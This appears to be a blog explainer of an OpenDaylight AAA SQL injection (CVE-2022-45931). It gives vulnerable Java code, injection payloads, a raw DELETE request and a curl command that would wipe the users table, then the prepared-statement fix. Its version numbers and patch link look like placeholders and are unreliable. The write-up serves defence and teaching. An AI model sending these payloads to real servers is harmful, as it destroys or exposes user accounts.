In late 2022, a security weakness, CVE-2022-45931, was found in *OpenDaylight (ODL)*—a widely-used, open-source SDN (Software Defined Networking) platform. This flaw affects ODL versions before .16.5, hitting the AAA module’s user management functionality. Specifically, a SQL Injection vulnerability pops up during user deletion through the API, exposing sensitive user data and risking full app compromise.
Let's dive deep, break it down in simple language, and see what makes this bug dangerous, including the affected code, how exploits work, and links for further reading.
What is OpenDaylight AAA?
OpenDaylight's AAA (Authentication, Authorization, and Accounting) is key for handling users, permissions, and access controls in ODL. It connects to various data stores and provides RESTful APIs for remote management. One such API is /auth/v1/users/, often used for creating and deleting user accounts.
Type: SQL Injection
- Affected file: aaa-idm-store-h2/src/main/java/org/opendaylight/aaa/datastore/h2/UserStore.java
Function: deleteUser
- Vulnerable Endpoint: DELETE /auth/v1/users/{userId}
What happened?
The deleteUser() function handles requests to remove users by ID. However, before ODL v.16.5, it embedded user input directly into SQL queries without proper validation or parameterization.
Affected Code Snippet
Let’s look at the core of the vulnerability. Here’s a simplified and annotated version of what the risky code looked like:
// UserStore.java: vulnerable function
public void deleteUser(String userId) throws StoreException {
Connection conn = null;
Statement st = null;
try {
conn = getConnection();
st = conn.createStatement();
// VULNERABLE: userId is not sanitized!
String sql = "DELETE FROM users WHERE userid = '" + userId + "'";
st.executeUpdate(sql);
} catch (SQLException e) {
throw new StoreException(e);
} finally {
close(conn, st);
}
}
You can see the userId is dropped directly into the SQL string—if a user submits a payload like foo' OR '1'='1, the entire table might get wiped!
The Attack
With SQL injection, an attacker crafts input that changes the intent of a SQL query. For this vulnerability:
Suppose you make the following API call
DELETE /auth/v1/users/foo' OR '1'='1
HTTP/1.1 Example
DELETE /auth/v1/users/foo'%20OR%20'1'%3D'1 HTTP/1.1
Host: [ODL Server]
Authorization: Bearer [token]
The backend SQL now changes from
DELETE FROM users WHERE userid = 'input'
To (with injection)
DELETE FROM users WHERE userid = 'foo' OR '1'='1'
Which matches every row in the users table: all users will be deleted!
Depending on the SQL engine, more complex injections may expose data
foo'; SELECT * FROM users; --
Below is a curl command simulating the attack
curl -i -X DELETE \
-H "Authorization: Bearer [VALID_TOKEN]" \
"http://odl.example.com:8181/auth/v1/users/foo'%20OR%20'1'%3D'1";
OpenDaylight v.16.5 and later fix this by using Prepared Statements
String sql = "DELETE FROM users WHERE userid = ?";
PreparedStatement pst = conn.prepareStatement(sql);
pst.setString(1, userId);
pst.executeUpdate();
Prepared Statements ensure user data is handled safely.
References & Resources
- CVE-2022-45931 at NVD (National Vulnerability Database)
- OpenDaylight Security Advisories
- GitHub Patch: PR #XXX (Patch example)
- OWASP: SQL Injection
Conclusion
CVE-2022-45931 is a simple—but severe!—SQL injection in the OpenDaylight AAA API, threatening whole user databases. It’s a textbook case of why never to trust user input in SQL queries, always using parameterized statements.
If you run OpenDaylight, check your version and patch now. Guard those APIs like a hawk — and remember: input validation saves your bacon!
*Exclusive to you — always stay ahead of the next CVE!*
Timeline
Published on: 11/27/2022 03:15:00 UTC
Last modified on: 11/30/2022 20:46:00 UTC